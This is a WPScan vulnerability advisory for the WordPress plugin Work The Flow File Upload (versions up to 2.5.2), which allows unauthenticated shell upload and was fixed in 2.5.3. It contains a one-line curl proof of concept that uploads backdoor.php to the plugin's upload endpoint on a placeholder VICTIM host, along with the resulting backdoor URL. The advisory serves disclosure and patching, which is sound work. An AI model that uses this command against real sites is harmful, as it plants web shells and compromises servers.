Work The Flow File Upload <= 2.5.2 - Shell Upload

Description
PoC:

curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php

Backdoor Location:

http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php

Affects

Plugin work-the-flow-file-upload
fixed in version 2.5.3

References

EXPLOITDB 36640
METASPLOIT exploit/unix/webapp/wp_worktheflow_upload
PACKETSTORM 131294
PACKETSTORM 131512
URL http://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Claudio Viviani
Submitter Website http://www.homelab.it
Submitter Twitter homelabit
Verified Yes
WPVDB ID 7883

Timeline

Publicly Published 2015-04-04
Added 2015-04-04
Last Updated 2015-05-15

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.